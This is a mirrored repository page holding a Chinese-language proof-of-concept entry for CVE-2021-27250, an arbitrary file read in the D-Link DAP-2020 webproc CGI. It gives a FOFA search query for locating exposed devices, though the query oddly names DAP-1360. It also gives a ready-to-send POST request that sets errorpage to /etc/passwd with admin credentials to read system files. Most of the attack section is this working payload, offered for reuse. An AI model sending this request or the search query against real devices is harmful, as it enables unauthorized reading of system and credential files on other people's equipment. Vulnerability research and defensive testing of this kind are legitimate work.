admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/D-LINK DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250.md

33 lines
819 B
Markdown
Raw Normal View History

更新漏洞库:网络设备漏洞/
2022-07-15 11:17:27 +08:00
# D-LINK DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250
## 漏洞描述
近日D-Link发布公告[1]称旗下产品DAP-2020存在任意文件读取漏洞CVE编号为CVE-2021-27250目前已在硬件版本A1固件版本1.01 上测试了PoC由于漏洞影响核心组件因此其他版本也可能受到此漏洞的影响
## 漏洞影响
```
D-LINK DAP-2020
```
## FOFA
```
body="DAP-1360" && body="6.05"
```
## 漏洞复现
登录页面
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220715110127290](./images/202207151101366.png)
更新漏洞库:网络设备漏洞/
2022-07-15 11:17:27 +08:00
验证POC
```
POST /cgi-bin/webproc
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220715110059377](./images/202207151100465.png)
Reference in New Issue Copy Permalink